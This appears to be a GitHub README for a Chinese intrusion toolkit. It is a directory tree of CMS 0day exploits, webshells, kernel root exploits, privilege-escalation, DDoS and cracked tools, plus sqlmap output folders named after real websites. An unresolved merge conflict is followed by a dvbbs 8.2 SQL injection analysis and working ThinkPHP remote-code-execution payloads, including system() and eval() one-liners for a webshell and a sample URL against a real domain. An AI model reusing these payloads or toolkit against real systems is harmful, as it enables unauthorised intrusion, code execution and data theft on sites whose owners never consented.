分享请注明来源~ https://github.com/w1109790800/Permeable
├─0day & exp
│ ├─08CMS
│ ├─AKCMS
│ ├─bbsxp
│ │ ├─BBSxp7.0
│ │ ├─bbsxp综合利用工具
│ │ └─BBSXP论坛漏洞完全注册工具
│ ├─BLUECMS
│ ├─CreateLiveCMS
│ ├─discuz
│ │ ├─discuz
│ │ ├─Discuz!PM短消息漏洞利用工具
│ │ ├─discuz2.5x
│ │ ├─discuz7
│ │ └─dz
│ ├─Diy-Page
│ ├─Drupal
│ ├─DVBBS
│ ├─Ecshop
│ ├─joomla
│ ├─KINGCMS
│ ├─NBArticle
│ ├─Oblog
│ │ ├─CBlog利用工具
│ │ ├─oblog
│ │ │ └─Tool
│ │ ├─Oblog 4.X Exp漏洞利用工具
│ │ ├─Oblog4.6SQL版漏洞利用工具
│ │ └─OblogSql
│ ├─php168
│ │ ├─php168exp
│ │ └─PHP168注入ODAY工具
│ ├─phpbb
│ │ ├─phpBB Extractor Reloaded(PHPBB漏洞利用工具)
│ │ ├─PHPBB2.0.22MOD版利用工具
│ │ ├─phpbblinkblind
│ │ ├─phpbb暴力破解工具
│ │ └─国外的PHPBB2论坛程序攻击工具
│ │ └─国外的PHPBB2论坛程序攻击工具
│ ├─phpcms
│ │ ├─PhpCms V9
│ │ │ └─phpv9任意读取文件
│ │ ├─phpcms0dayEXP_内部增强版
│ │ └─phpcms2007
│ ├─PHPweb
│ │ └─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码
│ ├─phpwind
│ │ ├─phpwind
│ │ ├─phpwind 5.0.1 Sql注射漏洞利用程序.php
│ │ ├─phpwind1.3.6论坛利用程序
│ │ ├─PhpWind2.0.2 & 3.31CE漏洞
│ │ ├─PHPWind4.3.2漏洞利用
│ │ ├─phpwind5.x passport_client.php UPDATE SQL Injection POC.php
│ │ ├─PHPWindBlog漏洞利用程序
│ │ │ └─phpwindblog
│ │ ├─PhpwindWapExp
│ │ ├─PHPWIND_exp
│ │ └─PHPWIND插件漏洞
│ ├─Shopex
│ ├─UCHOME
│ ├─wordpress
│ ├─Z-BLOG
│ ├─乔客JoekoeCMS
│ ├─别的一些exp
│ │ ├─CBlog利用工具
│ │ ├─EQdkp注入工具
│ │ ├─jsp暴源代码工具
│ │ │ └─jsp暴源代码工具
│ │ │ └─控件包
│ │ ├─L-Blog提权漏洞利用程序
│ │ ├─PJblog V3.0黑客漏洞利用工具
│ │ ├─sablog利用工具
│ │ ├─SuperUpFile1.0
│ │ ├─upfile
│ │ ├─“动感下载 v3.0”Cookie注入漏洞利用工具
│ │ ├─乔客exp
│ │ ├─凸丫丫
│ │ ├─动力文章系统
│ │ ├─记事狗微博3.0注入利用工具
│ │ ├─逍遥网站整站系统后门扫描器 1.0
│ │ ├─零号KingCMS上传利用
│ │ └─风汛暴库器
│ ├─动易cms
│ │ ├─SWInject
│ │ ├─动易2005Access版上传漏洞
│ │ ├─动易Region.asp注入辅助工具
│ │ └─动易漏洞利用工具与动画教程
│ ├─动网bbs
│ │ ├─动网asp版
│ │ │ ├─DVBBS 7.1.0 SP1 Savepost.asp漏洞工具
│ │ │ ├─dvbbs-qx0507
│ │ │ ├─Dvbbs8后台拿webshell的mdb
│ │ │ ├─dvbbsdt.exe
│ │ │ ├─动网7.0 sp2提升前台工具
│ │ │ ├─动网7.0 SP2漏洞利用程序
│ │ │ ├─动网7.0sp2前后台权限提升工具
│ │ │ ├─动网7.1sql
│ │ │ ├─动网7.1SQL版注入漏洞利用工具
│ │ │ ├─动网7在线人数攻击器增强版
│ │ │ ├─动网8.0sql最新漏洞利用工具
│ │ │ │ └─动网8.0sql最新漏洞利用工具
│ │ │ ├─动网8.0sql漏洞利用工具
│ │ │ │ └─dv8sql
│ │ │ ├─动网上传漏洞
│ │ │ ├─动网前台提权+爆后台密码
│ │ │ ├─动网前台提权工具华盟版
│ │ │ ├─动网博客7.1注入漏洞利用工具
│ │ │ ├─动网固顶贴工具
│ │ │ ├─动网帐号提取器
│ │ │ ├─动网日志清除工具
│ │ │ ├─动网空数据库合并成伪ASP木马专用工具
│ │ │ └─动网综合利用工具
│ │ └─动网php版
│ │ └─dvbbs_php2.0_fucker
│ ├─帝国EmpireCMS
│ ├─新云
│ │ └─xinyun
│ ├─科讯KesionCMS
│ ├─逐浪CMS
│ └─风讯foosunCMS
├─ASP 0day
│ ├─ASPCMS
│ ├─DvBBS(动网))
│ ├─foosun(风讯)
│ ├─Joekoe(乔客)
│ ├─kesion(科汛)
│ │ ├─kesioncms6.x-7.06
│ │ └─科讯cms利用
│ ├─KingCMS
│ ├─newasp(新云)
│ ├─[博客] pjblog
│ ├─[博客] Z-Blog
│ ├─动易cms
│ └─老Y文章管理系统
├─PHP 0day
│ ├─DeDeCms(织梦)
│ │ ├─Dede+v5.7+feedback.php-12-10-31
│ │ ├─DedeCms buy_action SQL利用工具
│ │ ├─dedecms2
│ │ │ └─dedecms2
│ │ ├─DeDecms各版本0day
│ │ │ └─DeDecms vx减缩版
│ │ ├─dedeexp
│ │ └─织梦dedecms 5.7上传漏洞代码
│ ├─ECMS(帝国)
│ ├─Joomla!
│ ├─PageAdmin cms
│ ├─PHP168
│ ├─PHPCMS
│ │ ├─phpv9任意读取
│ │ └─phpv9漏洞利用工具[1].rar
│ │ └─phpv9漏洞利用工具
│ ├─PHPweb
│ │ └─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码
│ ├─ThinkPHP 漏洞
│ ├─Uchome
│ ├─vBulletin 4.X
│ ├─[BBS] Discuz!
│ ├─[BBS] phpWind
│ ├─[博客] wordpress
│ ├─[商城] EcShop
│ │ ├─ecshop漏洞整理
│ │ │ └─ecshop漏洞整理
│ │ │ ├─ec2.6 2.7利用工具
│ │ │ └─ecshop注入exp
│ │ ├─eshop_exp
│ │ ├─Mc Shop网络商城0day利用工具
│ │ ├─Shopex 4.8.5
│ │ └─shopex_EXP及后台拿shell keio20120826整理版
│ └─[商城] ShopEx
│ └─Shopex 注入漏洞 0day (4.8.5)
├─xss 测试
│ └─xss完整版插件keepsenins
│ └─xss完整版插件keepsenins
│ ├─apps
│ │ └─index
│ │ ├─action
│ │ ├─lib
│ │ ├─model
│ │ └─view
│ │ ├─code
│ │ ├─index
│ │ ├─project
│ │ ├─public
│ │ │ ├─js
│ │ │ └─style
│ │ │ └─toolbar
│ │ ├─user
│ │ └─xing
│ ├─bin
│ ├─cache
│ ├─config
│ ├─static
│ │ ├─js
│ │ └─style
│ └─uauc
│ ├─class
│ ├─common
│ └─core
├─入侵资料
│ ├─3889相关
│ ├─Cookie欺骗入侵网站
│ ├─Linux
│ ├─Mssql
│ ├─Mysql
│ ├─php
│ ├─root sa相关
│ ├─vpn
│ │ ├─cmd下快速开VPN
│ │ │ └─autovpn(非常好的命令行下开vpn工具)
│ │ └─jz-vpn-setup
│ ├─xss
│ │ └─xss完整版插件keepsenins
│ │ └─xss完整版插件keepsenins
│ │ ├─apps
│ │ │ └─index
│ │ │ ├─action
│ │ │ ├─lib
│ │ │ ├─model
│ │ │ └─view
│ │ │ ├─code
│ │ │ ├─index
│ │ │ ├─project
│ │ │ ├─public
│ │ │ │ ├─js
│ │ │ │ └─style
│ │ │ │ └─toolbar
│ │ │ ├─user
│ │ │ └─xing
│ │ ├─bin
│ │ ├─cache
│ │ ├─config
│ │ ├─static
│ │ │ ├─js
│ │ │ └─style
│ │ └─uauc
│ │ ├─class
│ │ ├─common
│ │ └─core
│ ├─上传突破
│ ├─入侵aspx网站
│ ├─入侵技巧
│ ├─入侵文本
│ ├─其他入侵文章
│ │ └─webshell权限让服务器重启
│ ├─其他有用入侵资料
│ │ ├─其他有用入侵资料1
│ │ │ └─ngnix空字节执行漏洞
│ │ └─其他有用入侵资料2
│ ├─其他设备
│ ├─内网渗透相关
│ │ ├─arp
│ │ ├─ipc$入侵
│ │ ├─内网入侵
│ │ │ └─内网渗透资料
│ │ │ ├─rpc入侵
│ │ │ └─内网最常用工具下载及使用方法
│ │ ├─内网渗透经典文集_1
│ │ ├─内网渗透经典文集_2
│ │ ├─内网渗透经典文集_3
│ │ ├─域
│ │ ├─端口入侵
│ │ └─远程溢出
│ ├─反弹相关
│ ├─垃圾资料
│ ├─密码
│ └─手工注入
│ ├─access等其他注入
│ ├─MSSQL注入
│ │ └─SA错误修复
│ ├─MYSQl注入
│ ├─Oracle SQL注射
│ ├─PostgreSQL
│ ├─sqlmap
│ ├─延时注入
│ └─搜型登陆框新注入
├─大小马
│ ├─asp大马
│ ├─asp小马
│ ├─JSP
│ ├─php大马
│ ├─php小马
│ ├─一句话
│ └─菜刀
│ ├─CCC
│ └─Customize
├─技术文章
├─技术资料
├─提权利器
│ ├─32位系统用户账号密码查看器
│ ├─Api添加用户(F4ck Team)
│ ├─linux
│ │ ├─2.2.27
│ │ ├─2.2.x
│ │ ├─2.4 2.6
│ │ ├─2.4.17
│ │ ├─2.4.18
│ │ ├─2.4.19
│ │ ├─2.4.20
│ │ ├─2.4.21
│ │ ├─2.4.22
│ │ ├─2.4.22-10
│ │ ├─2.4.23
│ │ ├─2.4.24
│ │ ├─2.4.25
│ │ ├─2.4.26
│ │ ├─2.4.27
│ │ ├─2.4.29
│ │ ├─2.4.34
│ │ ├─2.4.x
│ │ ├─2.6.10
│ │ ├─2.6.11
│ │ ├─2.6.12
│ │ ├─2.6.13
│ │ ├─2.6.14
│ │ ├─2.6.15
│ │ ├─2.6.16
│ │ ├─2.6.17
│ │ ├─2.6.18
│ │ ├─2.6.2
│ │ ├─2.6.23 - 2.6.24
│ │ ├─2.6.4
│ │ ├─2.6.5
│ │ ├─2.6.7
│ │ ├─2.6.8
│ │ ├─2.6.9
│ │ ├─2.6.9-34
│ │ ├─2.6.x
│ │ ├─CentOS5.5
│ │ ├─FreeBSD 4.4 - 4.6
│ │ ├─FreeBSD 4.8
│ │ ├─FreeBSD 5.3
│ │ ├─icons
│ │ │ └─img
│ │ │ └─mini
│ │ ├─Mac OS X
│ │ ├─netcat
│ │ ├─OpenBSD
│ │ ├─r00t-t00ls
│ │ ├─red-7.3
│ │ ├─red-8.0
│ │ ├─red-hat8.0
│ │ ├─redhat 7.0
│ │ ├─redhat 7.1
│ │ ├─Root exploits
│ │ ├─Spaciel
│ │ ├─SunOS 5.10
│ │ ├─SunOS 5.7
│ │ ├─SunOS 5.8
│ │ └─SunOS 5.9
│ ├─LPK2.0
│ ├─NC反弹CMD
│ ├─PwDump7破解管理hash
│ ├─shell.Users组建vbs提权
│ ├─shift后门
│ ├─T00ls Lpk Sethc v4
│ ├─T00ls_Lpk_Sethc_v3
│ ├─不死帐号
│ ├─免NET提权
│ ├─免参数版pr
│ ├─剑眉大侠提权常用EXP
│ ├─开3389端口(神器)
│ ├─截取3389
│ │ └─dat
│ ├─提权工具
│ ├─无NET时添加用户(大胆)
│ ├─无NET时添加用户(拉登哥哥)
│ ├─星外提权EXP
│ │ ├─ee.exe提权法
│ │ └─vbs读取IIS提权法
│ ├─直接抓取Windows明文
│ └─解除TCPIP筛选小工具
├─注入练习
│ └─sqli-labs-master
│ ├─images
│ ├─index.html_files
│ │ └─icons
│ ├─Less-1
│ ├─Less-10
│ ├─Less-11
│ ├─Less-12
│ ├─Less-13
│ ├─Less-14
│ ├─Less-15
│ ├─Less-16
│ ├─Less-17
│ ├─Less-18
│ ├─Less-19
│ ├─Less-2
│ ├─Less-20
│ ├─Less-21
│ ├─Less-22
│ ├─Less-23
│ ├─Less-24
│ ├─Less-25
│ ├─Less-25a
│ ├─Less-26
│ ├─Less-26a
│ ├─Less-27
│ ├─Less-27a
│ ├─Less-28
│ ├─Less-28a
│ ├─Less-29
│ ├─Less-3
│ ├─Less-30
│ ├─Less-31
│ ├─Less-4
│ ├─Less-5
│ ├─Less-6
│ ├─Less-7
│ ├─Less-8
│ ├─Less-9
│ └─sql-connections
├─渗透工具
│ ├─3款土耳其注入工具
│ │ └─sql programlar
│ │ ├─m4xmysql
│ │ ├─sql dökücü
│ │ └─Sql Poizon v1.1
│ ├─Access 数据库特殊操作器
│ │ └─Access 数据库特殊操作器
│ ├─Domain3.5
│ │ └─Domain3.5
│ │ └─Domain3.5
│ ├─gason-0.9.5
│ ├─havij
│ ├─html 工具
│ ├─hulk
│ ├─LiQiDiS_2.71a33
│ │ └─LiQiDiS_2.71a33
│ │ ├─autoSave
│ │ ├─config
│ │ ├─dict
│ │ ├─help
│ │ │ ├─ConfigSQLServer
│ │ │ │ └─images
│ │ │ ├─如何配置基于我的SQLServer服务器转发
│ │ │ │ └─sqlImages
│ │ │ └─通过路由器上网的用户如何设置服务器转发
│ │ │ └─images
│ │ ├─languages
│ │ ├─md5engines
│ │ │ ├─hashcrack.com(slow)
│ │ │ ├─md5.mmkey.com
│ │ │ ├─md5.rednoize.com(slow)
│ │ │ ├─md5decryption.com
│ │ │ ├─passcracking.com
│ │ │ ├─tools.benramsey.com
│ │ │ ├─www.md5x.com(_uCode)
│ │ │ └─www.xmd5.org
│ │ ├─skinSharpSkins
│ │ ├─SQL
│ │ ├─tools
│ │ │ ├─ChinaChopper
│ │ │ └─lake2eval_client
│ │ │ └─func
│ │ ├─upload
│ │ │ └─webShells
│ │ └─works
│ ├─nikto-2.1.5
│ │ ├─databases
│ │ ├─docs
│ │ ├─plugins
│ │ └─templates
│ ├─oauth2-server-php-master
│ │ ├─src
│ │ │ └─OAuth2
│ │ │ ├─Controller
│ │ │ ├─GrantType
│ │ │ ├─Response
│ │ │ ├─ResponseType
│ │ │ ├─Storage
│ │ │ └─TokenType
│ │ └─test
│ │ ├─config
│ │ ├─lib
│ │ │ └─OAuth2
│ │ │ ├─Request
│ │ │ └─Storage
│ │ └─OAuth2
│ │ ├─GrantType
│ │ ├─Server
│ │ │ ├─Access
│ │ │ ├─Authorize
│ │ │ └─Grant
│ │ └─Storage
│ ├─Openvas中文漏洞扫描器
│ ├─pangoin 3.2.4
│ │ └─pangoin 3.2.4
│ │ └─Pangolin_Professinal_Edition_3[1].2.4.1132_CracKed
│ ├─php脱大容量表的优秀代码 by qiushui[r00ts]
│ ├─poc 401
│ ├─r00ts蘑菇(玩命青年)webshell木马组合套
│ │ └─星外提权aspx大马(去后门版)
│ ├─Slowloris.pl
│ ├─snuck
│ │ └─payloads
│ ├─sqlmap GUI
│ │ ├─cfg_dir
│ │ ├─doc
│ │ ├─extra
│ │ │ ├─beep
│ │ │ ├─cloak
│ │ │ ├─dbgtool
│ │ │ ├─icmpsh
│ │ │ ├─mssqlsig
│ │ │ ├─runcmd
│ │ │ │ └─windows
│ │ │ │ └─runcmd
│ │ │ ├─safe2bin
│ │ │ ├─shellcodeexec
│ │ │ │ └─linux
│ │ │ ├─shutils
│ │ │ └─sqlharvest
│ │ ├─lib
│ │ │ ├─controller
│ │ │ ├─core
│ │ │ ├─parse
│ │ │ ├─request
│ │ │ ├─takeover
│ │ │ ├─techniques
│ │ │ │ ├─blind
│ │ │ │ ├─brute
│ │ │ │ ├─dns
│ │ │ │ ├─error
│ │ │ │ └─union
│ │ │ └─utils
│ │ ├─output
│ │ │ ├─2012.100km.qdn.cn
│ │ │ ├─grawww.nju.edu.cn
│ │ │ ├─liuxue.eastday.com
│ │ │ ├─tw.beanfun.com
│ │ │ ├─www.artc.net.cn
│ │ │ ├─www.bangyuanjiaoyu.com
│ │ │ ├─www.facebook.com
│ │ │ ├─www.hbetsc.org
│ │ │ ├─www.hnslsdxy.com
│ │ │ ├─www.jeleechem.com
│ │ │ ├─www.jyht.hk
│ │ │ ├─www.motocurtain.com
│ │ │ └─www.onetouch.cn
│ │ ├─plugins
│ │ │ ├─dbms
│ │ │ │ ├─access
│ │ │ │ ├─db2
│ │ │ │ ├─firebird
│ │ │ │ ├─maxdb
│ │ │ │ ├─mssqlserver
│ │ │ │ ├─mysql
│ │ │ │ ├─oracle
│ │ │ │ ├─postgresql
│ │ │ │ ├─sqlite
│ │ │ │ └─sybase
│ │ │ └─generic
│ │ ├─procs
│ │ │ ├─mssqlserver
│ │ │ ├─mysql
│ │ │ ├─oracle
│ │ │ └─postgresql
│ │ ├─shell
│ │ ├─tamper
│ │ ├─thirdparty
│ │ │ ├─ansistrm
│ │ │ ├─beautifulsoup
│ │ │ ├─chardet
│ │ │ ├─clientform
│ │ │ ├─colorama
│ │ │ ├─fcrypt
│ │ │ ├─gprof2dot
│ │ │ ├─keepalive
│ │ │ ├─magic
│ │ │ ├─multipart
│ │ │ ├─odict
│ │ │ ├─oset
│ │ │ ├─pagerank
│ │ │ ├─prettyprint
│ │ │ ├─pydes
│ │ │ ├─socks
│ │ │ ├─termcolor
│ │ │ └─xdot
│ │ ├─txt
│ │ ├─udf
│ │ │ ├─mysql
│ │ │ │ ├─linux
│ │ │ │ │ ├─32
│ │ │ │ │ └─64
│ │ │ │ └─windows
│ │ │ │ ├─32
│ │ │ │ └─64
│ │ │ └─postgresql
│ │ │ ├─linux
│ │ │ │ ├─32
│ │ │ │ │ ├─8.2
│ │ │ │ │ ├─8.3
│ │ │ │ │ ├─8.4
│ │ │ │ │ └─9.0
│ │ │ │ └─64
│ │ │ │ ├─8.2
│ │ │ │ ├─8.3
│ │ │ │ ├─8.4
│ │ │ │ └─9.0
│ │ │ └─windows
│ │ │ └─32
│ │ │ ├─8.2
│ │ │ ├─8.3
│ │ │ ├─8.4
│ │ │ └─9.0
│ │ └─xml
│ │ └─banner
│ ├─struts2 漏洞利用工具
│ │ ├─extlib
│ │ ├─lib
│ │ │ ├─img
│ │ │ ├─skin
│ │ │ │ └─button_style_guide
│ │ │ ├─sysconfig
│ │ │ └─use
│ │ ├─plugins
│ │ │ ├─e0LfdE8DMNm09Dbc
│ │ │ ├─m1x7pUSLJT6gBdy8
│ │ │ ├─tmp
│ │ │ │ ├─cajcxyktchvglqgb
│ │ │ │ ├─gyqqzilgggacqyvz
│ │ │ │ ├─ocxdgefpyqfegdgb
│ │ │ │ ├─oquomowzpdsdgqfp
│ │ │ │ ├─oypxqfvdvylttpwf
│ │ │ │ ├─oywojapgdtpzewvv
│ │ │ │ ├─unsxczsdozetwfyv
│ │ │ │ ├─vjqdxsqlefyekjyx
│ │ │ │ ├─vmokdgbjnxmezswo
│ │ │ │ ├─xlsalbluxbqoimeb
│ │ │ │ └─xvyvduvlwcsyerqd
│ │ │ ├─_toolmao_sys_CMD
│ │ │ │ └─skin
│ │ │ │ └─button_style_flex
│ │ │ ├─_toolmao_sys_工具猫
│ │ │ ├─_toolmao_sys_扩展函数库
│ │ │ ├─_toolmao_sys_程序管理器
│ │ │ ├─_toolmao_sys_魔盒设置
│ │ │ │ └─skin
│ │ │ │ └─button_style_flex
│ │ │ └─取色工具
│ │ └─测试
│ ├─Umbrella Project 2012
│ │ └─list
│ ├─WebDDOS
│ ├─WebRobot
│ │ ├─data
│ │ │ ├─dict
│ │ │ │ └─eWebEditor
│ │ │ │ └─SysImage
│ │ │ │ ├─bg
│ │ │ │ ├─emot
│ │ │ │ └─file
│ │ │ ├─keyword
│ │ │ └─tools
│ │ │ ├─lake2eval_client
│ │ │ │ └─func
│ │ │ └─ShellManager
│ │ └─log
│ │ └─config
│ ├─WebSploit Framework V.2.0.3
│ ├─websurgery
│ │ └─WebSurgery_v06
│ ├─WSExplorer
│ ├─Xenotix_XSS_Exploitation_Framework
│ │ └─Xenotix XSS Exploitation Framework
│ │ └─build
│ │ └─Application Files
│ │ └─Xenotix XSS Exploit Framework_1_0_0_110
│ ├─一个扫C段WEB敏感信息的工具
│ │ └─一个扫C段WEB敏感信息的工具
│ │ └─一个扫C段WEB敏感信息的工具
│ │ └─plugins
│ ├─啊D扫目录asp+字典
│ │ └─啊D扫目录asp+字典
│ ├─国外超强注入工具Cfm Private SQL Injection
│ │ └─国外超强综合注入程序Cfm Private SQL Injection Tool
│ │ └─hackcfm_private_src
│ ├─御剑 1.5
│ │ ├─临时处理数据文件夹
│ │ └─配置文件
│ ├─文件合并工具
│ ├─目录字典
│ ├─老兵COOKIES欺骗工具
│ │ └─老兵COOKIES欺骗工具
│ ├─脱裤打包
│ │ ├─aspwebbackup
│ │ └─mssql
│ └─雷池加密解密
│ └─雷池加密解密
├─漏洞汇总
│ ├─BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team
│ │ └─BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team
│ ├─dede全部exp
│ │ └─Dede+v5.7+feedback.php-12-10-31
│ ├─ecshop
│ ├─ECSHOP全版本注入0DAY
│ ├─fck.py
│ ├─MySQL hash 登陆0day及exp
│ │ └─MySQL hash 登陆0day及exp
│ ├─mysql_win_remote_stuxnet_technique;mysql溢出
│ │ ├─1
│ │ │ └─mysql_scanner
│ │ │ └─mysql_scanner
│ │ └─mysql_win_remote_stuxnet_technique
│ │ └─mysql_scanner
│ │ └─mysql_scanner
│ ├─phpcms
│ │ └─phpv9任意读取
│ ├─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码
│ ├─Shopex 注入漏洞 0day (4.8.5)
│ ├─struts2 漏洞利用工具
│ │ └─struts2 漏洞利用工具
│ │ ├─extlib
│ │ ├─lib
│ │ │ ├─img
│ │ │ ├─skin
│ │ │ │ └─button_style_guide
│ │ │ ├─sysconfig
│ │ │ └─use
│ │ ├─plugins
│ │ │ ├─e0LfdE8DMNm09Dbc
│ │ │ ├─m1x7pUSLJT6gBdy8
│ │ │ ├─tmp
│ │ │ │ ├─cajcxyktchvglqgb
│ │ │ │ ├─ocxdgefpyqfegdgb
│ │ │ │ ├─oquomowzpdsdgqfp
│ │ │ │ ├─oypxqfvdvylttpwf
│ │ │ │ ├─oywojapgdtpzewvv
│ │ │ │ ├─vjqdxsqlefyekjyx
│ │ │ │ ├─vmokdgbjnxmezswo
│ │ │ │ ├─xlsalbluxbqoimeb
│ │ │ │ └─xvyvduvlwcsyerqd
│ │ │ ├─_toolmao_sys_CMD
│ │ │ │ └─skin
│ │ │ │ └─button_style_flex
│ │ │ ├─_toolmao_sys_工具猫
│ │ │ ├─_toolmao_sys_扩展函数库
│ │ │ ├─_toolmao_sys_程序管理器
│ │ │ ├─_toolmao_sys_魔盒设置
│ │ │ │ └─skin
│ │ │ │ └─button_style_flex
│ │ │ └─取色工具
│ │ └─测试
│ └─记事狗微博3.0注入利用工具
└─终端工具
├─APMServ-v5.2.6
├─Cain4.9
│ └─Cain4.9
│ ├─Winrtgen
│ └─Wordlists
├─FTP架设器
├─HFS网络文件服务器2.3
├─IIS信息查看软件
├─MAC地址修改器
├─MAC地址扫描器
├─NetFuke (arp欺骗)
│ ├─dic
│ ├─dll
│ ├─inc
│ ├─log
│ ├─ocx
│ └─voice
├─SYN数据流量攻击器
├─TV远控完美破解版
├─一款最牛清理C盘工具
├─七行者IP代理验证 V1.3
├─大侠专用擦PP工具
├─幻境网盾(无视ARP防火墙)
├─直接使服务器蓝屏重启的东东
│ └─MS12-020 PoC[bug修正版 + 数据包nc发送版]
│ └─数据包nc发送版
├─端口转发神器--reDuh
│ └─reDuhServers
├─组策略清除工具1.1
<<<<<<< HEAD
└─远程桌面连接(可复制粘贴)
'''
=======
└─远程桌面连接(可复制粘贴)
cb791f7b85a262e24af59376b30e2dac9a64b635
[dvbbs 8.2 SQL注射漏洞分析 全文]漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html
利用方式:一个典型的sql注射漏洞,按照公告里说的用
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&am
漏洞分析:动网在asp领域也算一个比较元老的程序,这次在8.2新版里有一个低级的错误.漏洞代码在login.asp 118行左右
......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,和php的urldecode导致的注射很类似,譬如用%2527就可以提交’过去了.
2.0版本 /ThinkPHP/Lib/Think/Util/Dispatcher.class.php
2.1版本/ThinkPHP/Lib/Core/Dispatcher.class.php
搜索preg_replace 有一段替换使用了/e模式, 而且thinkphp底层没有提供参数的过滤, 这边就直接崩溃了。
测试代码
/index.php/Module/Action/Param/${@phpinfo()}
http://www.js.10086.cn/wxcs/ppo/YC/index.php/Public/MedInsurance/1/%7B$%7Bphpinfo()%7D%7D
/admin//index.php/public/login
去掉login 版本信息出来
最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)}index.php
/module/aciton/param1/${@function_all()}
其中function_all代表任何函数,
比如:index.php/module/aciton/param1/${@phpinfo()}
获取服务器的系统配置信息等。
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
列出网站文件列表
index.php/module/action/param1/{${eval($_POST[s])}}
直接执行一句话代码,用菜刀直接连接.